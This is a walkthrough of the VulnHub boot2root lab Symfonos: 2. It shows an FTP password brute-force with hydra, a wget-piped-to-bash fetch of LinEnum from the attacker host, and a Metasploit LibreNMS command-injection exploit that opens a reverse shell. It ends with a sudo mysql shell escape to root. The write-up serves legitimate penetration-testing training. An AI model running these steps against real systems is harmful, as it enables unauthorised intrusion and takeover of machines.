Name : Symfonos: 2
Difficulty : Intermediate
Type : boot2root
Source : VulnHub
URL : https://www.vulnhub.com/entry/symfonos-2,331/
Entry : 11 / 30
Welcome to the walkthrough for Symfonos: 2, a boot2root CTF found on VulnHub. This is the eleventh VM in my VulnHub Challenge, and the first in the “intermediate” category! These intermediate machines are more challenging than beginner machines and should represent a similar challenge to those found in the OSCP labs.
The Symfonos family of virtual machines are more recent entries, with Symfonos: 2 being released on July 18, 2019.
Goal
As with most CTFs from VulnHub, the goal is to get the text file which serves as the flag from the /root directory.
Setup
I’m back to using VMWare player to host Kali and the Symfonos: 2 image, with both VMs running in a NAT network. The previous version of Symfonos used VirtualBox, but I have no reason to use it for this release, so I’m going back to my standby VM player.
Discovery
I use netdiscover to search for the IP address of the target VM:
root@dante:~# netdiscover -r 192.168.127.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.127.1 00:50:56:c0:00:08 1 60 VMware, Inc.
192.168.127.2 00:50:56:ee:35:86 1 60 VMware, Inc.
192.168.127.128 00:0c:29:6a:37:20 1 60 VMware, Inc.
192.168.127.254 00:50:56:e4:8e:ab 1 60 VMware, Inc.
So it looks like 192.168.127.128 is our target IP, given the IP for my Kali machine is 192.168.127.129.
Scanning
I’ll start with a quick nmap scan to look for open ports, then do a second scan that does a deeper dive into the services behind the open ports using the -sC and -sV flags:
root@dante:~# nmap 192.168.127.128
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-06 15:44 EDT
Nmap scan report for symfonos.local (192.168.127.128)
Host is up (0.000089s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:6A:37:20 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds
root@dante:~# nmap -sC -sV -p21,22,80,139,445 192.168.127.128
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-06 15:44 EDT
Nmap scan report for symfonos.local (192.168.127.128)
Host is up (0.00056s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 9d:f8:5f:87:20:e5:8c:fa:68:47:7d:71:62:08:ad:b9 (RSA)
| 256 04:2a:bb:06:56:ea:d1:93:1c:d2:78:0a:00:46:9d:85 (ECDSA)
|_ 256 28:ad:ac:dc:7e:2a:1c:f6:4c:6b:47:f2:d6:22:5b:52 (ED25519)
80/tcp open http WebFS httpd 1.21
|_http-server-header: webfs/1.21
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 00:0C:29:6A:37:20 (VMware)
Service Info: Host: SYMFONOS2; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h39m59s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: SYMFONOS2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.5.16-Debian)
| Computer name: symfonos2
| NetBIOS computer name: SYMFONOS2\x00
| Domain name: \x00
| FQDN: symfonos2
|_ System time: 2019-10-06T14:45:02-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-10-06T19:45:02
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.23 seconds
Nice mix of interesting services! Now with Symfonos: 1 I found a SMB share that had some interesting content on it, so I’m going to see if the same applies for Symfonos: 2.
SMB Reconnaissance
I’m going to use smbmap to look for more details on the SMB setup:
root@dante:~# smbmap -H 192.168.127.128
[+] Finding open SMB ports....
[+] Guest SMB session established on 192.168.127.128...
[+] IP: 192.168.127.128:445 Name: symfonos.local
Disk Permissions
---- -----------
print$ NO ACCESS
anonymous READ ONLY
IPC$ NO ACCESS
Feels like Deja Vu! There’s an anonymous share that has read-only access. Time to see what’s in it:
root@dante:~# smbclient -N \\\\192.168.127.128\\anonymous
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jul 18 10:30:09 2019
.. D 0 Thu Jul 18 10:29:08 2019
backups D 0 Thu Jul 18 10:25:17 2019
19728000 blocks of size 1024. 16310808 blocks available
smb: \> cd backups
smb: \backups\> dir
. D 0 Thu Jul 18 10:25:17 2019
.. D 0 Thu Jul 18 10:30:09 2019
log.txt N 11394 Thu Jul 18 10:25:16 2019
19728000 blocks of size 1024. 16310808 blocks available
smb: \backups\> get log.txt
getting file \backups\log.txt of size 11394 as log.txt (2781.7 KiloBytes/sec) (average 2781.7 KiloBytes/sec)
smb: \backups\> exit
A log file looks interesting, especially if it’s in a backup folder. Let me see what’s hiding inside:
root@dante:~# cat log.txt
root@symfonos2:~# cat /etc/shadow > /var/backups/shadow.bak
root@symfonos2:~# cat /etc/samba/smb.conf
#
# Sample configuration file for the Samba suite for Debian GNU/Linux.
#
#
# This is the main Samba configuration file. You should read the
# smb.conf(5) manual page in order to understand the options listed
# here. Samba has a huge number of configurable options most of which
# are not shown in this example
#
<snip>
...
# Uncomment to allow remote administration of Windows print drivers.
# You may need to replace 'lpadmin' with the name of the group your
# admin users are members of.
# Please note that you also need to set appropriate Unix permissions
# to the drivers directory for these users to have write rights in it
; write list = root, @lpadmin
[anonymous]
path = /home/aeolus/share
browseable = yes
read only = yes
guest ok = yes
root@symfonos2:~# cat /usr/local/etc/proftpd.conf
# This is a basic ProFTPD configuration file (rename it to
# 'proftpd.conf' for actual use. It establishes a single server
# and a single anonymous login. It assumes that you have a user/group
# "nobody" and "ftp" for normal operation and anon.
ServerName "ProFTPD Default Installation"
ServerType standalone
DefaultServer on
<snip>
...
# Set the user and group under which the server will run.
User aeolus
Group aeolus
# To cause every FTP user to be "jailed" (chrooted) into their home
# directory, uncomment this line.
#DefaultRoot ~
# Normally, we want files to be overwriteable.
AllowOverwrite on
# Bar use of SITE CHMOD by default
<Limit SITE_CHMOD>
DenyAll
</Limit>
# A basic anonymous configuration, no upload directories. If you do not
# want anonymous users, simply delete this entire <Anonymous> section.
<Anonymous ~ftp>
User ftp
Group ftp
# We want clients to be able to login with "anonymous" as well as "ftp"
UserAlias anonymous ftp
# Limit the maximum number of anonymous logins
MaxClients 10
# We want 'welcome.msg' displayed at login, and '.message' displayed
# in each newly chdired directory.
#DisplayLogin welcome.msg
#DisplayChdir .message
# Limit WRITE everywhere in the anonymous chroot
<Limit WRITE>
DenyAll
</Limit>
</Anonymous>
Wow, this is not what I expected. The log file contains output from at least 3 separate commands, and given the first one is a cat of /etc/shadow, it’s a safe bet that someone with root privileges created this file. But aside from that, there’s a few interesting points I can ascertain from this file:
- There is a backup of the
/etc/shadowfile in/var/backups/shadow.bak, so this may be a future target - The anonymous SMB share points to
/home/aeolus/share, soaeolusis a valid username - The ProFTPd server also runs as
aeolus, so we definitely have a username.
At this point I think it may be prudent to start poking around the other services.
Web Reconnaissance
As with other CTFs, I’m going to start with a simple curl and see what I can pull down from the main URL:
root@dante:~# curl -v http://192.168.127.128
* Trying 192.168.127.128:80...
* TCP_NODELAY set
* Connected to 192.168.127.128 (192.168.127.128) port 80 (#0)
> GET / HTTP/1.1
> Host: 192.168.127.128
> User-Agent: curl/7.66.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: webfs/1.21
< Connection: Keep-Alive
< Accept-Ranges: bytes
< Content-Type: text/html
< Content-Length: 183
< Last-Modified: Thu, 18 Jul 2019 13:03:42 GMT
< Date: Sun, 06 Oct 2019 20:19:35 GMT
<
<html>
<style>
html,body{
margin:0;
height:100%;}
img{
display:block;
width:100%; height:100%;
object-fit: cover;}
</style>
<body>
<img src="image.jpg">
</body>
</html>
* Connection #0 to host 192.168.127.128 left intact
Nothing terribly exciting. The image.jpg image is actually the header image use for this writeup and is just an image - no stenographic messages hidden within (I checked). Moreover, from the nmap scan earlier I can see that the server header is webfs, which is not particularly interesting. There is a note on the website that says not to use versions prior to 1.20 due to security issues, but this server is running v1.21, so I’m not going to spend much more time on this.
For the record I did run gobuster against it, but I was unable to find anything.
At this point I think that the FTP server is going to be interesting. I have a username, aeolus, and I have my favourite wordlist often used by CTF authors, namely rockyou.txt, so it’s time to see what I can find.
FTP Brute Force
I’m going to use hydra with the /usr/share/wordlists/rockyou.txt wordlist to see if I can find the password for aeolus via the FTP server:
root@dante:~# hydra -l aeolus -P /usr/share/wordlists/rockyou.txt ftp://192.168.127.128
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-10-06 16:28:24
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.127.128:21/
[STATUS] 2695.00 tries/min, 2695 tries in 00:01h, 14341704 to do in 88:42h, 16 active
[STATUS] 2742.33 tries/min, 8227 tries in 00:03h, 14336172 to do in 87:08h, 16 active
[STATUS] 2774.00 tries/min, 19418 tries in 00:07h, 14324981 to do in 86:05h, 16 active
[21][ftp] host: 192.168.127.128 login: aeolus password: sergioteamo
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-10-06 16:37:33
Now that took a bit of time compared to some other CTFs I’ve done as part of this series, but we are on an intermediate machine now, so I suppose that’s to be expected. Regardless, we can see that aeolus has a password of sergioteamo, so let me SSH into the machine. Keep in mind that the FTP server seems to be using the same accounts as what’s on the machine, so I expect this password to work for both SSH and FTP.
LinEnum.sh
Let me SSH to the machine and run my favourite Linux enumeration script, LinEnum.sh:
root@dante:~# ssh aeolus@192.168.127.128
The authenticity of host '192.168.127.128 (192.168.127.128)' can't be established.
ECDSA key fingerprint is SHA256:B1Gy++lPIkpytQPksfdhzAydQ8n3Hlor7srtoKol248.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.127.128' (ECDSA) to the list of known hosts.
aeolus@192.168.127.128's password:
Linux symfonos2 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u3 (2019-06-16) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jul 18 08:52:59 2019 from 192.168.201.1
aeolus@symfonos2:~$ wget -qO - http://192.168.127.129/LinEnum.sh | bash
#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.97
[-] Debug Info
[+] Thorough tests = Enabled
Scan started at:
Sun Oct 6 15:42:32 CDT 2019
### SYSTEM ##############################################
[-] Kernel information:
Linux symfonos2 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u3 (2019-06-16) x86_64 GNU/Linux
[-] Kernel information (continued):
Linux version 4.9.0-9-amd64 (debian-kernel@lists.debian.org) (gcc version 6.3.0 20170516 (Debian 6.3.0-18+deb9u1) ) #1 SMP Debian 4.9.168-1+deb9u3 (2019-06-16)
[-] Specific release information:
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
NAME="Debian GNU/Linux"
VERSION_ID="9"
VERSION="9 (stretch)"
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
[-] Hostname:
symfonos2
### USER/GROUP ##########################################
[-] Current user/group info:
uid=1000(aeolus) gid=1000(aeolus) groups=1000(aeolus),24(cdrom),25(floppy),29(audio),30(dip),44(vide
o),46(plugdev),108(netdev)
[-] Users that have previously logged onto the system:
Username Port From Latest
root pts/0 192.168.201.1 Thu Jul 18 12:12:33 -0500 2019
aeolus pts/0 192.168.127.129 Sun Oct 6 15:41:19 -0500 2019
[-] Who else is logged on:
15:42:32 up 1:13, 1 user, load average: 0.00, 0.32, 0.32
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
aeolus pts/0 192.168.127.129 15:41 8.00s 0.06s 0.00s bash
[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(Debian-exim) gid=109(Debian-exim) groups=109(Debian-exim)
uid=106(messagebus) gid=110(messagebus) groups=110(messagebus)
uid=107(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(aeolus) gid=1000(aeolus) groups=1000(aeolus),24(cdrom),25(floppy),29(audio),30(dip),44(vide
o),46(plugdev),108(netdev)
uid=1001(cronus) gid=1001(cronus) groups=1001(cronus),999(librenms)
uid=110(mysql) gid=114(mysql) groups=114(mysql)
uid=111(Debian-snmp) gid=115(Debian-snmp) groups=115(Debian-snmp)
uid=999(librenms) gid=999(librenms) groups=999(librenms)
[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
Debian-exim:x:105:109::/var/spool/exim4:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
aeolus:x:1000:1000:,,,:/home/aeolus:/bin/bash
cronus:x:1001:1001:,,,:/home/cronus:/bin/bash
mysql:x:110:114:MySQL Server,,,:/nonexistent:/bin/false
Debian-snmp:x:111:115::/var/lib/snmp:/bin/false
librenms:x:999:999::/opt/librenms:
[-] Super user account(s):
root
[-] Are permissions on /home directories lax:
total 16K
drwxr-xr-x 4 root root 4.0K Jul 18 06:01 .
drwxr-xr-x 22 root root 4.0K Jul 18 02:31 ..
drwxr-xr-x 3 aeolus aeolus 4.0K Jul 18 09:29 aeolus
drwxr-xr-x 2 cronus cronus 4.0K Jul 18 07:52 cronus
<snip>
...
[-] Listening TCP:
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 80 127.0.0.1:3306 *:*
LISTEN 0 128 *:5355 *:*
LISTEN 0 50 *:139 *:*
LISTEN 0 128 127.0.0.1:8080 *:*
LISTEN 0 32 *:21 *:*
LISTEN 0 128 *:22 *:*
LISTEN 0 20 127.0.0.1:25 *:*
LISTEN 0 50 *:445 *:*
LISTEN 0 128 :::5355 :::*
LISTEN 0 50 :::139 :::*
LISTEN 0 64 :::80 :::*
LISTEN 0 128 :::22 :::*
LISTEN 0 20 ::1:25 :::*
LISTEN 0 50 :::445 :::*
[-] Listening UDP:
State Recv-Q Send-Q Local Address:Port Peer Address:Port
UNCONN 0 0 127.0.0.53%lo:53 *:*
UNCONN 0 0 *:68 *:*
UNCONN 0 0 *:68 *:*
UNCONN 0 0 192.168.127.255:137 *:*
UNCONN 0 0 192.168.127.128:137 *:*
UNCONN 0 0 *:137 *:*
UNCONN 0 0 192.168.127.255:138 *:*
UNCONN 0 0 192.168.127.128:138 *:*
UNCONN 0 0 *:138 *:*
UNCONN 0 0 *:161 *:*
UNCONN 0 0 *:5355 *:*
UNCONN 0 0 :::5355 :::*
<snip>
...
[-] Current user's history files:
lrwxrwxrwx 1 root root 9 Jul 18 07:52 /home/aeolus/.bash_history -> /dev/null
[-] Location and contents (if accessible) of .bash_history file(s):
/home/cronus/.bash_history
/home/aeolus/.bash_history
[-] Any interesting mail in /var/mail:
total 12
drwxrwsr-x 2 root mail 4096 Oct 6 15:42 .
drwxr-xr-x 13 root root 4096 Jul 18 07:00 ..
-rw-rw---- 1 aeolus mail 1318 Oct 6 15:42 aeolus
### SCAN COMPLETE ####################################
You have new mail in /var/mail/aeolus
aeolus@symfonos2:~$
I’ll admit, there’s a lot of output here. But there are a few things that are interesting to me:
- The version of the kernel (4.9.0-9)
- The other users on the system (
cronos)
But the biggest thing that stood out for me is the other ports that are listening. I can see that MySQL is running on port 3306 and that there is something running on port 8080. There is an Apache config as well that was in the output of LinEnum.sh, so I’m going to check that out first.
Apache Configuration
I check the /etc/apache2/sites-enabled directory for any other websites that may be enabled:
aeolus@symfonos2:/etc/apache2/sites-enabled$ cd /etc/apache2/sites-enabled/
aeolus@symfonos2:/etc/apache2/sites-enabled$ ls
librenms.conf
aeolus@symfonos2:/etc/apache2/sites-enabled$ cat librenms.conf
<VirtualHost 127.0.0.1:8080>
DocumentRoot /opt/librenms/html/
ServerName localhost
AllowEncodedSlashes NoDecode
<Directory "/opt/librenms/html/">
Require all granted
AllowOverride All
Options FollowSymLinks MultiViews
</Directory>
</VirtualHost>
aeolus@symfonos2:/etc/apache2/sites-enabled$
Cool, there’s something available! Looks to be simple enough, but I’m not sure what this librems is. The /opt/librenms/ directory is locked down with 770 and is owned by the librems user and group, so I have no access. Let me check searchsploit:
root@dante:/opt/LinEnum# searchsploit librenms
----------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------- ----------------------------------------
LibreNMS - Collectd Command Injection (Metasploit) | exploits/linux/remote/47375.rb
LibreNMS - addhost Command Injection (Metasploit) | exploits/linux/remote/46970.rb
LibreNMS 1.46 - 'addhost' Remote Code Execution | exploits/php/webapps/47044.py
----------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root@dante:/opt/LinEnum#
So there are exploits available, and there are some within Metasploit too! Now all I need is to be able to access that site.
SSH Tunnels
Time for another technique that I used a lot in the OSCP labs - SSH tunnels. I’m going to create a tunnel from my machine to the Symfonos: 2 machine by setting up a simple SSH tunnel like so:
root@dante:~# ssh -L 8080:localhost:8080 aeolus@192.168.127.128
aeolus@192.168.127.128's password:
Linux symfonos2 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u3 (2019-06-16) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Sun Oct 6 15:41:19 2019 from 192.168.127.129
aeolus@symfonos2:~$
This creates a local tunnel between my machine and the target machine via SSH. Specifically, I’ve setup a listener so that any traffic that goes to port 8080 on my local machine will tunnel through to port 8080 on the Symfonos: 1 machine. Let me browse to localhost:8080 in a browser and see what this site is all about:
I try logging in with aeolus/sergioteamo and it works like a charm! Now there are a lot of options on the site, but I’m mainly interested in finding out what version of LibreNMS is installed so I can confirm I have an exploit for it:
Unfortunately the version information isn’t that helpful. No problem, I’ll try Metasploit and see.
Exploitation with Metasploit
I’ll start up Metasploit and use the exploit/linux/http/librenms_addhost_cmd_inject exploit:
root@dante:~# msfconsole
+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __________________ | |
| ==c(______(o(______(_() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+---------------------------+---------------------------+
| o O o | \'\/\/\/'/ |
| o O | )======( |
| o | .' LOOT '. |
| |^^^^^^^^^^^^^^|l___ | / _||__ \ |
| | PAYLOAD |""\___, | / (_||_ \ |
| |________________|__|)__| | | __||_) | |
| |(@)(@)"""**|(@)(@)**|(@) | " || " |
| = = = = = = = = = = = = | '--------------' |
+---------------------------+---------------------------+
=[ metasploit v5.0.52-dev ]
+ -- --=[ 1929 exploits - 1079 auxiliary - 332 post ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
msf5 > use exploit/linux/http/librenms_addhost_cmd_inject
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set RHOSTS localhost
RHOSTS => localhost
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set RPORT 8080
RPORT => 8080
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set USERNAME aeolus
USERNAME => aeolus
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set PASSWORD sergioteamo
PASSWORD => sergioteamo
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set LHOST eth0
LHOST => eth0
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > show options
Module options (exploit/linux/http/librenms_addhost_cmd_inject):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD sergioteamo yes Password for LibreNMS
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS localhost yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base LibreNMS path
USERNAME aeolus yes User name for LibreNMS
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST eth0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > exploit
[*] Exploiting target 0.0.0.1
[*] Started reverse TCP double handler on 192.168.127.129:4444
[-] Exploit aborted due to failure: not-found: Failed to access the login page
[*] Exploiting target 127.0.0.1
[*] Started reverse TCP double handler on 192.168.127.129:4444
[*] Successfully logged into LibreNMS. Storing credentials...
[+] Successfully added device with hostname HPIRTAMeLb
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[+] Successfully deleted device with hostname HPIRTAMeLb and id #1
[*] Command: echo YI1K6R7cEO7FDMk4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "YI1K6R7cEO7FDMk4\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.127.129:4444 -> 192.168.127.128:34370) at 2019-10-06 18:27:01 -0400
[*] Session 1 created in the background.
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > sessions -i 1
[*] Starting interaction with 1...
python -c 'import pty;pty.spawn("/bin/bash")'
cronus@symfonos2:/opt/librenms/html$ export TERM=screen
export TERM=screen
cronus@symfonos2:/opt/librenms/html$ whoami
whoami
cronus
cronus@symfonos2:/opt/librenms/html$
Success! I’ve managed to exploit the service, get a session, create a pseudo-TTY session via Python, and now I see I’m logged in as the cronus user!
Get The Flag
I’ll just do a quick sudo -l check to see if my new user can give me any privileged access:
cronus@symfonos2:/opt/librenms/html$ sudo -l
sudo -l
Matching Defaults entries for cronus on symfonos2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User cronus may run the following commands on symfonos2:
(root) NOPASSWD: /usr/bin/mysql
Perfect, I can run mysql via sudo without a password. According to GTFOBins, I can get myself a nice shell with a one-liner:
cronus@symfonos2:/opt/librenms/html$ sudo /usr/bin/mysql -e '\! /bin/sh'
sudo /usr/bin/mysql -e '\! /bin/sh'
# whoami
whoami
root
# cd /root
cd /root
# ls
ls
proof.txt
The only thing left is to grab the flag:
# cat proof.txt
cat proof.txt
Congrats on rooting symfonos:2!
, ,
,-`{-`/
,-~ , \ {-~~-,
,~ , ,`,-~~-,`,
,` , { { } } }/
; ,--/`\ \ / / }/ /,/
; ,-./ \ \ { { ( /,; ,/ ,/
; / ` } } `, `-`-.___ / `, ,/ `,/
\| ,`,` `~.___,---} / ,`,,/ ,`,;
` { { __ / ,`/ ,`,;
/ \ \ _,`, `{ `,{ `,`;`
{ } } /~\ .-:::-. (--, ;\ `,} `,`;
\\._./ / /` , \ ,:::::::::, `~; \},/ `,`; ,-=-
`-..-` /. ` .\_ ;:::::::::::; __,{ `/ `,`; {
/ , ~ . ^ `~`\:::::::::::<<~>-,,`, `-, ``,_ }
/~~ . ` . ~ , .`~~\:::::::; _-~ ;__, `,-`
/`\ /~, . ~ , ' ` , .` \::::;` <<<~``` ``-,,__ ;
/` .`\ /` . ^ , ~ , . ` . ~\~ \\, `,__
/ ` , ,`\. ` ~ , ^ , ` ~ . . ``~~~`, `-`--, \
/ , ~ . ~ \ , ` . ^ ` , . ^ . , ` .`-,___,---,__ ``
/` ` . ~ . ` `\ ` ~ , . , ` , . ~ ^ , . ~ , .`~---,___
/` . ` , . ~ , \ ` ~ , . ^ , ~ . ` , ~ . ^ , ~ . `-,
Contact me via Twitter @zayotic to give feedback!
Fin.